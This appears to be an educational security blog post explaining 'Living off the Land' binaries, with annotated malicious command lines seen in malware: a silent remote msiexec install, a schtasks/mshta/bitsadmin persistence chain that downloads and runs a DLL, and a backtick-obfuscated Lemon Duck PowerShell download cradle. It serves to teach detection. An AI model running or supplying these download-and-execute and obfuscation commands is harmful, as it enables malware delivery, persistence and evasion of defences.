What is a LOLBIN?
To me, the phrase ‘Attackers Living off the Land’ evokes imagery of a foreign army sacking and plundering the countryside, like Attila the Hun’s campaign through Gaul in 451 CE, during which he pillaged much of the province before withdrawing to his homeland after the Battle of the Catalaunian Plains.
In the context of computer security, however, Living off the Land is somewhat less dramatic.
It describes an attacker using legitimate software and tools for malicious purposes, in particular tools that are built into a Microsoft Windows installation. The term LOLBIN (Living Off the Land Binary) is used for one such tool, and it has since been extended to LOLBAS (Living Off the Land Binaries And Scripts) to cover scripts as well.
The phrase has been attributed to Christopher Campbell and Matthew Graeber, whose 2013 BSides Augusta talk (linked under Further Watching) describes how built-in tools can defeat defensive countermeasures such as antivirus and application whitelisting.
The LOLBAS project grew out of an effort to document every such tool that attackers can use for Living off the Land.
Let's look at some examples.
LOLBIN Example: msiexec
In the first example we will look at the MITRE ATT&CK technique System Binary Proxy Execution (T1218), specifically its Msiexec sub-technique (T1218.007). An attacker or malware uses this technique to have a trusted Windows binary run code that would otherwise have been blocked by antivirus (AV) or application control.
The LOLBIN in this example is msiexec, the Windows Installer command-line tool, which installs software packages from the command line. Normal usage looks like this:
msiexec.exe /i "C:\example.msi"
An example of malicious usage is seen in this trojan sample:
msiexec.exe /i hxxps://deripaskavinpelcom.com/Sfgrdhytui/Launch4j.msi /qn
In this example we can see:
- msiexec both downloads the package from the URL and executes it, and the /qn switch suppresses the installer UI so the victim sees nothing.
- The attacker avoids a separate downloader and dropper; note that msiexec still writes the fetched package to a temporary location on disk before installing it, so file-based scanning is reduced rather than eliminated.
- The attacker is attempting to bypass application control and whitelisting, because the code is executed by msiexec.exe, a signed Microsoft binary that such policies almost always allow.
Another Example: schtasks, mshta, bitsadmin
Windows Scheduled Tasks are popular amongst malware authors for achieving persistence and executing secondary payloads.
Here is an example where a creative malware author uses a scheduled task to execute a script which in turn downloads and runs a file:
schtasks.exe /create /f /sc onlogon /rl highest /tn "Windows Services 44" /tr "mshta.exe vbscript:CreateObject('WScript.Shell').Run('cmd /c bitsadmin /transfer 22130 hxxp://l0lz.co/System.dll %APPDATA%\Microsoft\System.dll & %APPDATA%\Microsoft\System.dll & exit',0)(Window.Close)"
In this example we can see:
- The attacker creates a Scheduled Task with schtasks.exe that runs at every logon (/sc onlogon) with the highest run level (/rl highest), overwriting any existing task of the same name (/f). The name ‘Windows Services 44’ is chosen to blend in with legitimate tasks.
- The task invokes the mshta.exe LOLBIN to proxy execute an inline VBScript passed as a vbscript: URI, so no script file touches disk.
- The VBScript launches cmd.exe, which uses bitsadmin (the command-line client for the Background Intelligent Transfer Service, BITS) to download a secondary payload from the aptly named ‘l0lz.co’ domain into %APPDATA%\Microsoft\System.dll and then runs it. BITS is normally used for software updates, which is exactly why attackers use it to transfer files: both the tool and its traffic look routine.
A Final Example: PowerShell
PowerShell has proven to be a favourite amongst malware authors and threat actor groups, because it ships with every modern Windows system and exposes the full .NET Framework and Windows APIs from a single command line.
Here is a sample of ‘Lemon Duck’ cryptocurrency-mining malware launching powershell.exe to download a secondary payload:
powershell.exe -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('hxxp://t.z'+'er9g.com/7p.php?0.7*mail_js*ZKx33m2*bwI27OnXZP*'+[Environment]::OSVersion.version.Major);bpu ('hxxp://t.z'+'er9g.com/mail.jsp?js_0.7')
The attackers use the backtick (`), PowerShell’s escape character, inside bare words (IE`x, Ne`w-Obj`ect, WebC`lient) so that the command still runs as IEX(New-Object Net.WebClient) but no longer contains the literal string ‘New-Object Net.WebClient’ that an inspection mechanism might be monitoring for. The same idea is applied to the URL, which is split into ‘hxxp://t.z’+‘er9g.com’ so the full domain never appears on the command line; PowerShell joins the fragments at runtime. The -w hidden switch keeps the PowerShell window off screen, and the downloaded script is passed straight to IEX (Invoke-Expression), so it runs from memory without being written to disk. bpu is not defined on this command line, so it is presumably a function supplied by the first download.
Conclusion
LOLBINs are signed, built-in tools that threat actors and malware use to avoid detection and bypass common security controls. Because the binary itself is trusted, the signal lies in how it is invoked, its command line, its parent process and any network connections it makes, rather than in the file itself.
Further Watching
DerbyCon 2018 ‘LOLBins: Nothing to LOL about’ - Oddvar Moe: https://youtu.be/NiYTdmZ8GR4
BSides Augusta 2013 ‘Living Off the Land’ - Christopher Campbell and Matthew Graeber: https://youtu.be/1R_2LnX8uVg